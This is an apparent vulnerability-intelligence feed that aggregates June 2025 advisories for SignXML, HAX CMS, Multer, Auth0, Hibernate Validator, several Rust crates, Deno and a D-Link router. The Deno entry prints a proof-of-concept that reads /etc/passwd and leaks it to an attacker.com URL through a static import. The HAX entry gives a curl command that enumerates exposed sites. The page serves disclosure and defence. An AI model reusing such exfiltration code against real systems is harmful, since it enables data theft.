Threat and Vulnerability Intelligence Database

Description: When verifying signatures with X509 certificate validation turned off and an HMAC shared secret set (signxml.XMLVerifier.verify(require_x509=False, hmac_key=...)), prior versions of SignXML are vulnerable to a potential algorithm confusion attack. Unless the user explicitly limits the expected signature algorithms using the signxml.XMLVerifier.verify(expect_config=...) setting, an attacker may supply a signature unexpectedly signed with a key other than the provided HMAC key, using a different (asymmetric key) signature algorithm. Starting with signxml 4.0.4, specifying hmac_key causes the set of accepted signature algorithms to be restricted to HMAC only, if not already restricted by the user.

References:
https://github.com/XML-Security/signxml/security/advisories/GHSA-6vx8-pcwv-xhf4
https://nvd.nist.gov/vuln/detail/CVE-2025-48994
https://github.com/XML-Security/signxml/commit/e3c0c2b82a3329a65d917830657649c98b8c7600
https://github.com/advisories/GHSA-6vx8-pcwv-xhf4

CVSS: MEDIUM (6.9)

EPSS Score: 0.03%

Source: Github Advisory Database (PIP)
June 5th, 2025 (5 days ago)
Description:

Summary: An unauthenticated information disclosure vulnerability exists in the PSU deployment of HAX CMS via the haxPsuUsage API endpoint. This allows any remote unauthenticated user to retrieve a full list of PSU websites hosted on HAX CMS. When chained with other authorization issues (e.g., HAX-3), this could assist in targeted attacks such as unauthorized content modification or deletion.

Details: The endpoint https://open-apis.hax.cloud/api/services/stats/haxPsuUsage returns a list of websites on the PSU instance of HAX CMS. This endpoint is exposed without any authentication or authorization checks. The source of the issue is in the haxPsuUsage.js file, which appears to directly serve the site listing without verifying user identity or access level. This enables anyone with the endpoint URL to enumerate all site instances under the PSU deployment. This endpoint may have originally been used for internal or statistical purposes but is now publicly accessible, representing a privacy and enumeration risk.

PoC: To reproduce this vulnerability, open a terminal or browser and send a GET request to the following endpoint: curl https://open-apis.hax.cloud/api/services/stats/haxPsuUsage

Impact: The haxPsuUsage endpoint exposes a full list of PSU HAX CMS websites to any unauthenticated user, allowing external actors to enumerate all sites under the PSU domain. This alone represents an information disclosure vulnerability. When chained with the Lack Of Authorization Checks CVE, w...

CVSS: MEDIUM (5.3)

EPSS Score: 0.04%

Source: Github Advisory Database (NPM)
June 5th, 2025 (5 days ago)
Description:

Impact: A vulnerability in Multer versions >=1.4.4-lts.1, <2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process.

Patches: Users should upgrade to 2.0.1

Workarounds: None

References:
https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg
https://nvd.nist.gov/vuln/detail/CVE-2025-48997
https://github.com/expressjs/multer/issues/1233
https://github.com/expressjs/multer/pull/1256
https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
https://github.com/advisories/GHSA-g5hg-p3ph-g8qg

CVSS: HIGH (8.7)

EPSS Score: 0.04%

Source: Github Advisory Database (NPM)
June 5th, 2025 (5 days ago)
Description:

Overview: The Auth0 Wordpress plugin contains a critical vulnerability due to insecure deserialization of cookie data. If exploited, since SDKs process cookie content without prior authentication, a threat actor could send a specially crafted cookie containing malicious serialized data.

Am I Affected? You are affected by this vulnerability if you meet the following preconditions:
- Applications using the Auth0 WordPress plugin, versions between 5.0.0 BETA-0 to 5.0.1.
- Auth0 WordPress plugin uses the Auth0-PHP SDK with version 8.0.0-BETA3 to 8.3.0.

Fix: Upgrade the Auth0 WordPress plugin to the latest version (v5.3.0).

References:
https://github.com/auth0/auth0-PHP/security/advisories/GHSA-v9m8-9xxp-q492
https://github.com/auth0/laravel-auth0/security/advisories/GHSA-c42h-56wx-h85q
https://github.com/auth0/symfony/security/advisories/GHSA-98j6-67v3-mw34
https://github.com/auth0/wordpress/security/advisories/GHSA-862m-5253-832r
https://nvd.nist.gov/vuln/detail/CVE-2025-48951
https://github.com/advisories/GHSA-862m-5253-832r

CVSS: CRITICAL (9.3)

EPSS Score: 0.08%

Source: Github Advisory Database (Composer)
June 5th, 2025 (5 days ago)
Description: Hibernate Validator before 6.2.0 and 7.0.0, by default and depending on how it is used, may interpolate user-supplied input in a constraint violation message with Expression Language. This could allow an attacker to access sensitive information or execute arbitrary Java code. Hibernate Validator as of 6.2.0 and 7.0.0 no longer interpolates custom constraint violation messages with Expression Language and strongly recommends not allowing user-supplied input in constraint violation messages. CVE-2020-5245 and CVE-2025-4428 are examples of related, downstream vulnerabilities involving Expression Language interpolation of user-supplied data.

References:
https://nvd.nist.gov/vuln/detail/CVE-2025-35036
https://github.com/hibernate/hibernate-validator/pull/1138
https://github.com/hibernate/hibernate-validator/commit/05f795bb7cf18856004f40e5042709e550ed0d6e
https://github.com/hibernate/hibernate-validator/commit/254858d9dcc4e7cd775d1b0f47f482218077c5e1
https://github.com/hibernate/hibernate-validator/commit/d2db40b9e7d22c7a0b44d7665242dfc7b4d14d78
https://github.com/hibernate/hibernate-validator/commit/e076293b0ee1bfa97b6e67d05ad9eee1ad77e893
https://docs.jboss.org/hibernate/stable/validator/reference/en-US/html_single/#section-hibernateconstraintvalidatorcontext
https://github.com/hibernate/hibernate-validator/compare/6.1.7.Final...6.2.0.Final
https://hibernate.atlassian.net/browse/HV-1816
https://hibernate.org/validator/documentation/migration-guide/#6-2-0-cr1
https://in.relation.to...

CVSS: HIGH (7.9)

Source: Github Advisory Database (Maven)
June 5th, 2025 (5 days ago)
Description: The following functions in the anon-vec crate are unsound due to insufficient checks on their arguments:
- AnonVec::get_ref()
- AnonVec::get_mut()
- AnonVec::remove_get()

The crate was built as a learning project and is not being maintained.

References:
https://github.com/RylanYancey/anon-vec
https://rustsec.org/advisories/RUSTSEC-2025-0039.html
https://github.com/advisories/GHSA-pr59-jjr4-gcf6
Source: Github Advisory Database (Rust)
June 5th, 2025 (5 days ago)
Description: Affected versions append root to group listings, unless the correct listing has exactly 1024 groups. This affects both:
- The supplementary groups of a user
- The group access list of the current process

If the caller uses this information for access control, this may lead to privilege escalation. This crate is not currently maintained, so a patched version is not available. Versions older than 0.8.0 do not contain the affected functions, so downgrading to them is a workaround.

Recommended alternatives:
- uzers (an actively maintained fork of the users crate)
- sysinfo

References:
https://github.com/ogham/rust-users/issues/44
https://rustsec.org/advisories/RUSTSEC-2025-0040.html
https://github.com/advisories/GHSA-m65q-v92h-cm7q
Source: Github Advisory Database (Rust)
June 5th, 2025 (5 days ago)
Description:

Summary: Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.

Details: Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:
- The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
- When --allow-write and --allow-read permissions are given, an attacker can perform a sophisticated two-step attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.

PoC:
    const __filename = new URL("", import.meta.url).pathname;
    let oldContent = await Deno.readTextFile(__filename);
    let passFile = await Deno.readTextFile("/etc/passwd");
    let pre = 'import {foo} from "https://attacker.com?val=' + encodeURIComponent(passFile) + '";\n';
    await Deno.writeTextFile(__filename, pre + oldContent);

Executing a file containing this payload twice, with deno run --allow-read --allow-write, would cause the password file to leak on the network, even though no network permission was granted. This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access

References:
https://github.com/denoland/deno/security/advisories/GHSA-jv4x...
Source: Github Advisory Database (Rust)
June 5th, 2025 (5 days ago)
Description: The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.
Source: The Record
June 5th, 2025 (5 days ago)

CVE-2025-5621

Description: A vulnerability has been found in D-Link DIR-816 1.10CNB05 and classified as critical. Affected by this vulnerability is the function qosClassifier of the file /goform/qosClassifier. The manipulation of the argument dip_address/sip_address leads to OS command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS: HIGH (7.3)

EPSS Score: 0.24%

Source: CVE
June 5th, 2025 (5 days ago)